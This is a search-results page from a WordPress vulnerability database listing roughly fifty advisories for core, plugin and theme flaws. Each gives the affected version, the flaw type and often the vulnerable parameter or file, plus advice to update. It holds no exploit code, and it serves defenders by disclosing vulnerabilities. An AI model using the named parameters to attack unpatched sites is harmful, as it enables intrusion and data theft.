45958 matches found
WordPress Unconfirmed Plugin <= 1.2.4 - XSS
Because of this vulnerability, the attackers can inject arbitrary web script or HTML via the "s" parameter. Solution Update the plugin...
WordPress All In One WP Security & Firewall Plugin <= 3.8.7 - SQL Injection
Because of this SQL Injection vulnerability, attackers can execute arbitrary SQL commands via unspecified vectors. Solution Upgrade the plugin...
WordPress All In One WP Security & Firewall Plugin <= 3.8.9 - CSRF
Because of this vulnerability, attacker can hijack the authentication of administrators for requests that delete logs of 404 HTTP status codes. Solution Update the plugin...
WordPress Sodahead Polls Plugin <= 2.0.3 - Multiple XSS
Because of these vulnerabilities, the attackers can inject arbitrary web script or HTML. Solution Update the plugin...
WordPress Twitter LiveBlog Plugin <= 1.1.2 - CSRF and XSS
Because of these cross site request forgery vulnerabilities, the attackers can hijack the authentication of administrators for requests. In that way they can change plugin settings via unspecified vectors or conduct cross-site scripting attacks. Solution Update the plugin...
WordPress wpCommentTwit Plugin <= 0.5 - Multiple CSRF and XSS
Because of these cross site request forgery vulnerabilities, the attackers can hijack the authentication of administrators for requests. In that way they can change plugin settings via unspecified vectors or conduct cross-site scripting attacks. Solution This plugin is closed...
WordPress WPDataTables Plugin 1.5.3 - SQL Injection
This WordPress WPDataTables plugin is prone to an SQL injection. This vulnerability allows an attacker to modify data, compromise the access and application or exploit hidden vulnerabilities in the underlying database. Solution Upgrade the plugin...
WordPress <= 4.0.0 - XSS #3
Because of this vulnerability in the "media-playlists" function, the attackers can inject arbitrary web script or HTML via unspecified vectors. Related records: http://db.threatpress.com/vulnerability/wordpress/wordpress-4-0-0-xss...
WordPress Easy MailChimp Forms Plugin <= 5.0.6 - XSS
Because of this vulnerability, the attackers can inject arbitrary web script or HTML via the updateoptions action to wp-admin/admin-ajax.php. Solution Update the plugin...
WordPress Contact Form DB Plugin <= 2.8.15 - Multiple XSS
Because of these vulnerabilities, the attackers can inject arbitrary web script or HTML via the "form" or "enc" parameter. Solution Update the plugin...
WordPress Titan Framework Plugin <= 1.5 - Multiple XSS
Because of these vulnerabilities, the attackers can inject arbitrary web script or HTML via the "t" parameter to iframe-googlefont-preview.php or the "text" parameter to iframe-font-preview.php. Solution Update the plugin...
WordPress WP Ban Plugin <= 1.6.3 - BYPASS
Because of this vulnerability, the attackers can bypass the IP blacklist via a crafted X-Forwarded-For header. Solution Update the plugin...
WordPress Content Audit Plugin <= 1.6.0 - SQL Injection
SQL injection vulnerability in content-audit-schedule.php in the Content Audit plugin before 1.6.1 for WordPress allows remote attackers to execute arbitrary SQL commands via the "Audited content types" option in the content-audit page to wp-admin/options-general.php. Solution Update the plugin...
WordPress Simple Retail Menus Plugin <= 4.0 - SQL Injection
Because of this vulnerability in includes/mode-edit.php, remote authenticated editors can execute arbitrary SQL commands in an edit action to wp-admin/admin.php via the "targetmenu" parameter. Solution Update the plugin...
WordPress ZooEffect Plugin <= 1.08 - Reflected XSS
This plugin is prone to a HTTP referer reflected cross site scripting vulnerability. Solution Update the plugin...
WordPress Gallery Objects Plugin 0.4 - SQL Injection
This WordPress Gallery Objects plugin is prone to an SQL injection. This vulnerability allows an attacker to modify data, compromise the access and application or exploit hidden vulnerabilities in the underlying database. Solution Update the plugin...
WordPress Video Posts Webcam Recorder Plugin <= 1.55.4 - XSS
Because of this vulnerability in posts/videowhisper/rlogout.php, the attackers can inject arbitrary web script or HTML. Solution Update the plugin...
WordPress Verification Code for Comments Plugin <= 2.1.0 - Multiple XSS
Because of these vulnerabilities in vcc.js.php, the attackers can inject arbitrary web script or HTML. Solution Update the plugin...
WordPress VideoWhisper Video Presentation Plugin <= 3.30 - Multiple XSS
Because of these vulnerabilities, the attackers can inject arbitrary web script or HTML. Solution Update the plugin...
WordPress WP FaceThumb Plugin <= 1.0 - XSS
Because of this vulnerability, the attackers can inject arbitrary web script or HTML via the "ajaxurl" parameter to index.php. Solution Update the plugin...
WordPress BIC Media Widget Plugin <= 1.0 - XSS
Because of this vulnerability, the attackers can inject arbitrary web script or HTML via the "param" parameter. Solution Update the plugin...
WordPress Tera Charts Plugin - Remote Path Traversal File Disclosure
Tera Charts plugin's zoomabletreemap.php "fn" parameter is prone to remote path traversal file disclosure vulnerability that allow an attacker to get potentially sensitive information. Other attacks are also possible. Solution Update the plugin...
WordPress iMember360 Plugin <= 3.9.001 - Disclosure of Database Credentials
Because of this vulnerability, the attackers can obtain database credentials via the "i4wdbinfo" parameter. Solution Update the plugin...
WordPress Contact Bank Plugin <= 2.0.19 - XSS
Because of this vulnerability, the attackers can inject arbitrary web script or HTML via the Label field, related to form layout configuration. Solution Update the plugin...
WordPress NextCellent Gallery Plugin <= 1.19.17 - XSS
Because of this vulnerability in admin/manage-images.php, authenticated users can inject arbitrary web script or HTML via the "Alt & Title Text" field. Solution Update the plugin...
WordPress 2.0.11 - Cross Site Request Forgery
WordPress 2.0.11 version is prone to a cross site request forgery via "/wp-admin/options-discussion.php". It allows an attacker to perform certain unauthorized actions in the context of the affected application. Solution Update WordPress...
WordPress Dropdown Menu Widget Plugin <= 1.7.1 - CSRF and XSS
Because of this vulnerability, the attackers can hijack the authentication of arbitrary users for requests that insert cross-site scripting sequences. Solution Update the plugin...
WordPress Login With Ajax Plugin <= 3.0 - CSRF
Because of this vulnerability, the attackers can hijack the authentication of arbitrary users for requests that modify this plugin's settings. Solution Update the plugin...
WordPress WP MailUp Plugin <= 1.3.1 - BYPASS
Because of this vulnerability, the attackers can modify plugin settings and conduct cross-site scripting attacks via unspecified vectors. Solution Update the plugin...
WordPress Lazyest Backup Plugin <= 0.2.1 - XSS
Because of this vulnerability in lazyest-backup.php, the attackers can inject arbitrary web script or HTML via the "xmlorall" parameter. Solution Update the plugin...
WordPress Connections Plugin <= 0.7.1.5 - Unspecified vulnerability
Because of this vulnerability, this plugin has unknown impact and attack vectors. Solution Update the plugin...
WordPress Mingle Forum Plugin <= 1.0.34 - Multiple XSS
Because of these vulnerabilities, the attackers can inject arbitrary web script or HTML. Solution Update the plugin...
WordPress FLV Player Plugin 1.1 - SQL Injection
This WordPress FLV Player plugin's "id" parameter is prone to an SQL injection. This vulnerability allows an attacker to modify data, compromise the access and application or exploit hidden vulnerabilities in the underlying database. Solution Update the plugin...
WordPress Mingle Forum Plugin <= 1.0.32 - Multiple SQL Injection #2
Because of these vulnerabilities in fs-admin/fs-admin.php, the authenticated users can execute arbitrary SQL commands via the "usergroup" parameter in an addusertogroup action or "addforumgroupid" parameter in an addforumsubmit action. Solution Update the plugin...
WordPress Pretty Link Lite Plugin <= 1.5.3 - XSS
Because of this vulnerability in pretty-bar.php, the attackers can inject arbitrary web script or HTML via the "slug" parameter. Solution Update the plugin...
WordPress Zingiri Web Shop Plugin <= 2.4.0 - Multiple XSS Vulnerabilities
Zingiri Web Shop plugin is prone to multiple cross-site scripting vulnerabilities. After the malicious code posted up, Javascrip code inserted to database with "$POST'notes'" variable. When administrator wants to see list of ordered items list, Javascript codes will come from database and start...
WordPress BuddyPress Plugin 1.5.5 - Remote SQL Injection
Buddypress plugin is prone to Remote SQL injection. This vulnerability allows an attacker to modify data, alter queries to the application SQL database, compromise the access and application or exploit hidden vulnerabilities in the underlying database. Solution Update the plugin...
WordPress Recent Comments Plugin <= 2.0.6 - XSS
Because of this vulnerability in the core.php, the attackers can inject arbitrary web script or HTML via the "page" parameter. Solution Update the plugin...
WordPress RedLine Theme 1.65 - Cross Site Scripting
WordPress RedLine theme's "s" parameter is prone to a cross-site scripting vulnerability. It fails to properly clean up user-supplied input. An attacker may execute arbitrary script code in the browser of an user in the context of the affected site. In this way the attacker can steal cookie-based...
WordPress Morning Coffee Theme 3.5 - Cross Site Scripting
WordPress Morning Coffee theme's "index.php" parameter is prone to a cross-site scripting vulnerability. It fails to properly clean up user-supplied input. An attacker may execute arbitrary script code in the browser of an user in the context of the affected site. In this way the attacker can ste...
WordPress AdRotate Plugin <= 3.6.5 - SQL Injection
AdRotate plugin is prone to an SQL injection. This vulnerability allows an attacker to modify data, alter queries to the application SQL database, compromise the access and application or exploit hidden vulnerabilities in the underlying database. Solution Upgrade the plugin...
WordPress UnGallery plugin <= 1.5.8 - Local File Disclosure
This vulnerability allows an attacker to obtain important information from local files on computers running the vulnerable application. Other attacks are also possible. Solution Update the plugin...
WordPress <= 3.1.2 - Unspecified vulnerability #2
Because of this vulnerability, there are unknown impact and attack vectors related to "Media security." in this WordPress version. Solution Update WordPress...
WordPress Mediatricks Viva Thumbs Plugin - Multiple Information Disclosure Vulnerabilities
This Mediatricks Viva Thumbs plugin is prone to multiple information-disclosure vulnerabilities. It fails to properly clean up user-supplied input. The attackers may use these issues to confirm the existence of local files outside the WordPress Webroot. The information that they get can be useful...
WordPress <= 3.0.1 - SQL Injection
Because of this vulnerability, authenticated users can execute arbitrary SQL commands via the Send Trackbacks field. Solution Update WordPress...
WordPress Copperleaf Photolog Plugin 0.16 - SQL injection Vulnerability
This Copperleaf Photolog plugin is prone to an SQL injection vulnerability. It allows the attackers to execute arbitrary SQL commands via the "postid" parameter. Solution Update the plugin...
WordPress 2.9 - Failure to Restrict URL Access
A new feature, called "Trash", was implemented so that users were able to retrieve posts that they may have deleted by accident. Any posts that are placed within the trash are viewable by authenticated users, no matter what privileges they have. Solution Update the WordPress, because since versio...
JD-WordPress 2.0 RC2 - Remote file inclusion
The vulnerabilities in JD-WordPress allow remote attackers to execute arbitrary PHP code via a URL in the mosConfigabsolutepath parameter in 1 wp-comments-post.php, 2 wp-feed.php, or 3 wp-trackback.php. Solution Update WordPress...
WordPress 2.8.1 - Remote Cross-Site Scripting Vulnerability
This version of WordPress is prone to a cross-site scripting vulnerability. Solution Update WordPress...
WordPress Lytebox Plugin 1.3 - Local File Inclusion
WP-Lytebox fails to properly sanitize user-supplied input, therefore it allows an attacker to include a file. An attacker can view files and execute scripts. Solution Upgrade to version 1.3.1 or later...